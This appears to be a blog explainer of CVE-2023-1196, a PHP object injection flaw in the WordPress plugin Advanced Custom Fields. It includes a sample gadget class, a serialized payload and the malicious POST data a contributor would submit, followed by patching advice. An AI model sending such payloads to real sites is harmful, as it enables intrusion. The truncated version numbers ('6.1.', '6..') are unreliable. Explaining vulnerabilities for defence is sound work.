CVE-2023-1196 - Breaking Down the PHP Object Injection in ACF Plugins for WordPress (Exploit, Explanation & Code Example)

WordPress powers over 40% of the web, making plugins like Advanced Custom Fields (ACF) extremely popular for site customization. But with popularity comes attention from hackers. In 2023, a critical vulnerability was found in ACF that could let attackers with basic contributor access exploit PHP Object Injection — a serious, code-level security issue. That vulnerability is tracked as CVE-2023-1196.

Let’s break down what this is, why it matters, and how attackers could use it (with practical PHP code). This guide is simple, direct, and made just for you — with key references and code samples.

Versions impacted: 6.x before 6.1. and 5.x before 5.12.5

- Problem: These versions unserialize user-controlled data — in other words, they take input from users (contributors and above) and trust it to load PHP objects into memory.
- Threat: If an attacker knows what they're doing (and a vulnerable gadget class exists), they could execute arbitrary PHP code by carefully crafting their input. This is called PHP Object Injection.

Contributor access is easy to get (think guest posters, junior content creators, etc). That makes this bug extra dangerous.

Why is "unserialize" dangerous?

In PHP, the unserialize() function turns text back into objects. If attackers control this text, they can try to load malicious objects — if a “gadget” class exists on the site (a class whose destructors, __wakeup, or other magic methods do bad things when called), code execution can be triggered.

Here’s a classic example

$data = $_POST['data'];
$obj = unserialize($data);   // DANGER if you control "data"

If $data is anything controlled by an attacker, it can trigger a chain reaction.

How does this happen in ACF?

The ACF plugin handles custom fields' data in the backend. For some fields/settings, it would unserialize input from user-supplied sources (like the block editor). If you have influencer access like a Contributor, you can add or edit posts with crafted data in fields handled by ACF, then trigger the buggy unserialize behavior.

The ACF changelog says (see Advanced Custom Fields changelog):
> "Improved security related to unserializing values."

References

- WPScan Advisory Database: CVE-2023-1196
- NVD - CVE-2023-1196 Description

Crafting the Exploit: Real-World Example

Let’s see how an attacker would abuse this. Suppose the website has ACF 6.. installed; a contributor can supply custom field data. The exploitable code path (simplified) looks like:

// In ACF internals, simplified
$value = $_POST['acf_field_value'];
$data = maybe_unserialize($value); // Calls PHP unserialize internally

If you POST a serialized string to acf_field_value (via the WordPress admin as an editor or contributor), it’ll be unserialized.

Exploit

Suppose a plugin, or the theme, has some class with a __destruct or __wakeup magic method that does something with file operations (common in WordPress world). Here’s an example class (this code isn’t in ACF, but many WordPress sites load admin tools, backups, etc):

class VulnerableLogger {
    public $logfile;
    public function __destruct() {
        file_put_contents($this->logfile, "You have been hacked!\n", FILE_APPEND);
    }
}

An attacker crafts this payload

// Create the object, set $logfile to /tmp/hacked.txt or anywhere writable
$payload = new VulnerableLogger();
$payload->logfile = '/tmp/hacked.txt';
// Turn to serialized string:
$serialized = serialize($payload);
// Output: O:16:"VulnerableLogger":1:{s:7:"logfile";s:14:"/tmp/hacked.txt";}

Malicious POST data

acf_field_value = O:16:"VulnerableLogger":1:{s:7:"logfile";s:14:"/tmp/hacked.txt";}

Submit this as a contributor when editing a post. When ACF unserializes this, PHP loads the VulnerableLogger object, and when it gets garbage collected (or the page ends), the destructor writes to /tmp/hacked.txt.

If someone discovers a class on your site that executes commands or reads files (*many backup/SEO plugins, or custom code, are vulnerable*), attackers can run PHP code or leak sensitive data by carefully shaping the input.

Fixing & Deterring This Bug

Patch now!  
Update to ACF Free or Pro 6.1. or later (or 5.12.5+):  
- ACF Changelog & Downloads

Never trust user input in PHP’s unserialize()

- Use JSON if you must store user-supplied arrays/objects
- Review your custom plugins/themes for unsafe unserialize usage

Conclusion

CVE-2023-1196 is a classic example of how one problematic PHP function (unserialize) can undermine a huge plugin and thousands of sites through seemingly harmless contributor input. With just a small window of access and some knowledge, attackers could trigger dangerous code paths.

Your action items?  
Update your ACF plugin (and any others using unserialize), keep user roles tight, and never trust input directly.

References:  
- WPScan: CVE-2023-1196 Report  
- NVD: CVE-2023-1196  
- ACF Changelog

Timeline

Published on: 05/02/2023 09:15:00 UTC
Last modified on: 05/08/2023 18:06:00 UTC